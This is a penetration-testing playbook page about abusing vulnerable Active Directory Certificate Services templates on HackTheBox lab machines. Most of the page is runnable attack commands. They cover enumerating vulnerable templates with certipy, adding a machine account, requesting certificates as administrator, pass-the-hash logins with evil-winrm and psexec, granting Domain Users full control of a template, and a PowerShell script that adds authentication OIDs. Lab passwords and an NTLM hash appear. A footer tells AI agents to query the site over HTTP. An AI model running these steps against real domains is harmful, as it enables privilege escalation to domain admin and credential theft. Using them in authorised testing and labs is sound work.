# Certificate Authority Vulnerable Cert * [ ] Is it vulnerable? * [ ] `certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3` Tip: The vulnerable cert may say that domain computers can enroll or some other computer access as opposed to user access to enroll. In this case you will need a computer account. You can create a computer account for this purpose. \*\*Find machine account quota `nxc ldap authority -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M MAQ` \*\*Add a computer `impacket-addcomputer -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host authority -domain-netbios 'authority.htb' 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'` * [ ] certipy-ad * [ ] `certipy-ad req -ca AUTHORITY-CA -target authority.authority.htb -template CorpVPN -upn administrator -username ATTACKERSYSTEM$ -password 'Summer2018!'` * [ ] `certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.228.253` * [ ] `evil-winrm -u 'administrator' -H a52f78e4c751e5f5e17e1e9f3e58f4ee -i dc` or `impacket-psexec -hashes a52f78e4c751e5f5e17e1e9f3e58f4ee:a52f78e4c751e5f5e17e1e9f3e58f4ee administrator@dc` * [ ] certify.exe - \[ ] \*\*Break out key and pem from pfx WinRM SSL can use certificate authentication * A pfx file will hold the public and private keys. * evil-winrm will requires these to be separated into respective files pub priv files * `openssl pkcs12 -in file.pfx -info` * pfx2john * Extract priv keys: `openssl pkcs12 -in file.pfx -nocerts -out privkey.pem -nodes` * Extract pub keys: `openssl pkcs12 -in file.pfx -nokeys -out pubcert.cert` * `evil-winrm -S -c pubcert.cert -k privkey.pem -i dc01` \-- #### WriteDacl on Cert `ldapsearch -LLL -H ldap://htb.local -b 'cn=configuration,dc=htb,dc=local' -D 'amanda@htb.local' -w 'Ashare1972' -s sub '(objectclass=pkicertificatetemplate)' '*'` #### Set full controll to all users Do not do this in a pentest. Give rights to a single principal `dsacls "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL" /G "HTB\Domain Users:GA"` #### Add OIDs ```powershell # Import Active Directory Module Import-Module ActiveDirectory # Define the distinguished name (DN) of the certificate template $dn = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL" # Define the application policies to add $policies = @("1.3.6.1.5.5.7.3.2","1.3.6.1.5.5.7.3.4","1.3.6.1.4.1.311.10.3.4") # Get the existing application policies (if any) $currentPolicies = (Get-ADObject -Identity $dn -Properties "msPKI-Certificate-Application-Policy")."msPKI-Certificate-Application-Policy" # Check if there are any existing policies and merge them with the new ones if ($currentPolicies -ne $null) {$policies += $currentPolicies | Where-Object { $_ -notin $policies }} # Update the certificate template with the new application policies Set-ADObject -Identity $dn -Replace @{ "msPKI-Certificate-Application-Policy" = $policies } ``` #### Request the cert `certipy-ad req -u ‘User’ -p 'Password' -ca 'Certificate Authority' -template 'ESC4' -upn ‘User you want the certificate for [Domain Admin]’ -dc-ip ‘Domain Controller IP’` #### Use the cert to get a tgt `certipy-ad auth -pfx 'The user we got the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP'` `certipy-ad auth -pfx sizzler.pfx -dc-ip 10.129.71.105 -dns-tcp -ldap-shell` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jvsautomate.gitbook.io/playbook/scenarios/certificate-authority-vulnerable-cert.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.